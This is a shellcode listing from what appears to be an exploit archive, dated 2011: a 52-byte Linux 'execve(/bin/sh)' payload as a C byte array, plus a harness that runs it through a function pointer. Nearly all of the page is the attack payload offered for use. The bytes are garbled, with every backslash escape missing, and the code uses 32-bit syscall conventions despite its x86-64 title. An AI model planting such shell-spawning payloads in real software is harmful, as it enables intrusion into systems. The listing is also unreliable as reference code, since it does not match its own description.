linux/x86-64 execve(/bin/sh) 52 bytes

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : linux/x86-64 execve(/bin/sh) 52 bytes
# Published : 2011-12-03
# Author :
# Previous Title : win32/PerfectXp-pc1/sp3 (Tr) Add Admin Shellcode 112 bytes
# Next Title : SuperH (sh4) Add root user with password

/*

Exploit Title : linux/x86-64 execve(/bin/sh) 52 bytes
Tested on     : Linux iron 2.6.38-8-generic #42-Ubuntu SMP Mon Apr 11 03:31:24 UTC 2011 x86_64 x86_64 x86_64 GNU/Linux
Date          : 03/12/2011
Author        : X-h4ck
Email         : mem001@live.com
Website       : http://www.pirate.al
Greetz        : mywisdom - Danzel - Wulns~ - IllyrianWarrior- Ace - M4yh3m - Saldeath 
                ev1lut1on - bi0 - Slimshaddy - d3trimentaL - Lekosta 
                CR - Hack-Down - H3ll - Pretorian - d4nte_sA 

*/


char SC[] =   "xebx1dx5bx31xc0x67x89x43x07x67x89x5bx08x67x89x43x0c"
              "x31xc0xb0x0bx67x8dx4bx08x67x8dx53x0cxcdx80xe8xdexff"
              "xffxffx2fx62x69x6ex2fx73x68x4ex41x41x41x41x42x42x42"
              "x42";

int
main (int argc, char **argv)
{
        int (*ret)();              
        ret = (int(*)())SC; 
                                   
        (int)(*ret)();             
        exit(0);                   
}